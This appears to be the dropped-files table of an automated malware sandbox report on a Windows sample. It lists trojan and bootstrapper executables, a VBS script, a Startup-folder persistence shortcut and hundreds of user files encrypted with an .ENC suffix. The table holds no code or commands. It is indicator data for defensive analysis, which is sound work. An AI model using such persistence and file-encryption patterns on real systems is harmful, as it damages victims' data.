Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
8svMXMXNRn.exe
|
PE32+ executable (GUI) x86-64, for MS Windows
|
initial sample
|
||
C:\Users\user\AppData\Local\Temp\Bootstrapper.exe
|
PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\BootstrapperV1.22.exe
|
PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\BootstrapperV21.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\TrojanXD.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\script.vbs
|
Unicode text, UTF-8 text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\voosiq.exe
|
PE32+ executable (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Roaming\explorer.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
\Device\ConDrv
|
ISO-8859 text, with CRLF, LF line terminators
|
dropped
|
||
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage engine DataBase, version 0x620, checksum 0xde048b76, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_BootstrapperV1.2_8a67a53847f1550bba47f83cc7f50ab9fda1622_30d98452_79ae1923-2aab-47ba-a2dd-a54311f75107\Report.wer
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WERF666.tmp.dmp
|
Mini DuMP crash report, 16 streams, Sun Oct 13 17:09:14 2024, 0x1205a4 type
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WERF83B.tmp.WERInternalMetadata.xml
|
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Microsoft\Windows\WER\Temp\WERF87B.tmp.xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\.curlrc.ENC
|
data
|
dropped
|
||
C:\Users\user\3D Objects\desktop.ini.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\.curlrc.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\000003.log.ENC
|
Non-ISO extended-ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\CURRENT.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\data_0.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\data_1.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\data_2.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\data_3.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Cache\Cache_Data\index.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\05349744be1ad4ad_0.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0786087c3c360803_0.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0998db3a32ab3f41_0.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0f25049d69125b1e_0.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\230e5fe3e6f82b2c_0.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\2798067b152b83c7_0.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\2a426f11fd8ebe18_0.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\4a0e94571d979b3c_0.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\4ca3cb58378aaa3f_0.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\560e9c8bff5008d8_0.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\56c4cd218555ae2b_0.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\6fb6d030c4ebbc21_0.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\7120c35b509b0fae_0.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\71febec55d5c75cd_0.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\72d9f526d2e2e7c8_0.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\78bff3512887b83d_0.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\86b8040b7132b608_0.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8c159cc5880890bc_0.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8c84d92a9dbce3e0_0.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\8e417e79df3bf0e9_0.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\91cec06bb2836fa5_0.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\927a1596c37ebe5e_0.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\92c56fa2a6c4d5ba_0.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\946896ee27df7947_0.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\983b7a3da8f39a46_0.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\aba6710fde0876af_0.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\b6d5deb4812ac6e9_0.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\bba29d2e6197e2f4_0.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\bf8eae3dcaf681ca_0.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\cf3e34002cde7e9c_0.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\d5dedf551f4d1592_0.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f0cf6dfa8a1afa3d_0.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f941376b2efdd6e6_0.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\f971b7eda7fa05c3_0.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\fd17b2d8331c91e8_0.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\febb41df4ea2b63a_0.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index-dir\the-real-index.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\index.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\index-dir\the-real-index.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\wasm\index.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\LOCK.ENC
|
Non-ISO extended-ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\LOG.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\000003.log.ENC
|
Non-ISO extended-ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\CURRENT.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOCK.ENC
|
Non-ISO extended-ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\MANIFEST-000001.ENC
|
OpenPGP Public Key
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\LocalPrefs.json.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\MANIFEST-000001.ENC
|
OpenPGP Public Key
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Network\Cookies-journal.ENC
|
Non-ISO extended-ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Network\Cookies.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Network\NetworkDataMigrated.ENC
|
Non-ISO extended-ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Network\Reporting and NEL-journal.ENC
|
Non-ISO extended-ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Network\Reporting and NEL.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\CURRENT.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOCK.ENC
|
Non-ISO extended-ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\MANIFEST-000001.ENC
|
OpenPGP Public Key
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\Visited Links.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lst.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt23.lst.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheAcro65536.dat.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Adobe\Color\ACECache11.lst.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\IconCache.db.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Bootstrapper.exe.log
|
CSV text
|
modified
|
||
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\explorer.exe.log
|
CSV text
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\History\desktop.ini.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
modified
|
||
C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\AC\INetCache\8FGZXQXH\configuration[1].xml
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\EntClientDb.edb
|
Extensible storage engine DataBase, version 0x620, checksum 0x30cb0b1b, page size 8192, DirtyShutdown, Windows version 10.0
|
dropped
|
||
C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\edb.chk
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\edb.log
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\edbres00001.jrs
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\Database\anonymous\edbres00002.jrs
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\DiagOutputDir\CriticalError_playbackTrace_1748106733.txt
(copy)
|
ASCII text, with CRLF, LF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\DiagOutputDir\CriticalError_playbackTrace_1748106733.txt.~tmp
|
ASCII text, with CRLF, LF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\SRPData.xml (copy)
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Packages\Microsoft.ZuneMusic_8wekyb3d8bbwe\LocalState\SRPData.xml.~tmp
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\.ses.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\0164771190.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\0196354653.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\0409654664.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\0450125302.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\0518291756.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\0653671941.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\0982390758.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\1033868256.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\1141274626.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\1206337459.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\1237160943.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\1239919175.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\1287572840.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\1422339599.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\1927994670.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\2103954313.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\2118371548.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\2168651637.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\2265332024.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\2385760553.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\2567238426.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\2585558601.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\2669049752.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\2843307863.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\3024948866.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\3322604653.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\3476888679.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\3643399760.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\4478492829.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\4676012234.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\4736274156.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\4941266003.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\4965367024.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\5064077962.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\5281104033.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\5491630718.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\5622580005.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\5713452101.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\5809130301.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\6092905029.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\6109303877.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\6183211589.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\6213653276.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\6329227256.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\6422942404.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\6577738837.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\6750529025.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\7011884383.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\7155756679.ENC
|
Clarion Developer (v2 and above) memo data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\7216804956.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\7245361316.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\7457734050.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\7676687441.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\7847944919.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\8182259827.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\8200946536.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\8351801105.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\8492240360.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\8552718761.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\8784112376.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\8886835349.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\8975065801.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\8995528179.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\9217021447.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\9275373402.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\9329238007.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\9422479677.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\9655434068.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\9659692161.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\9925478147.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\AdobeARM.log.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\DISCORD
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Hamster.mp3
|
ISO Media, MP4 Base Media v1 [ISO 14496-12:2003]
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\Log.tmp
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1qo2vp3v.mzr.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2wfuorws.z4t.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_40vrje1z.nnv.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5dav3qlo.ebr.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dpusphmk.my3.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fzbnfcle.yo4.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jyddv2y5.ik1.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l4wdzxz5.5mk.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sxh04bci.kh1.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tqf0arbo.jve.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u1walyv5.xch.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uvpcdrn1.c4g.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wgitn5y1.2yy.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yc2welzi.yun.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yppo0orq.2m3.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zpoglvcm.ugz.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\user.bmp.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\chrome.exe.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\cv_debug.log.ENC
|
OpenPGP Public Key
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\dbghelp.dll.ENC
|
data
|
modified
|
||
C:\Users\user\AppData\Local\Temp\picture.png
|
JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 624x350, components
3
|
dropped
|
||
C:\Users\user\AppData\Local\_curlrc.ENC
|
data
|
dropped
|
||
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sun Oct 13 16:10:00
2024, mtime=Sun Oct 13 16:10:00 2024, atime=Sun Oct 13 16:10:00 2024, length=78848, window=hide
|
dropped
|
||
C:\Users\user\NTUSER.DAT.ENC
|
Non-ISO extended-ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TM.blf.ENC
|
Non-ISO extended-ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000001.regtrans-ms.ENC
|
Non-ISO extended-ASCII text, with no line terminators
|
dropped
|
||
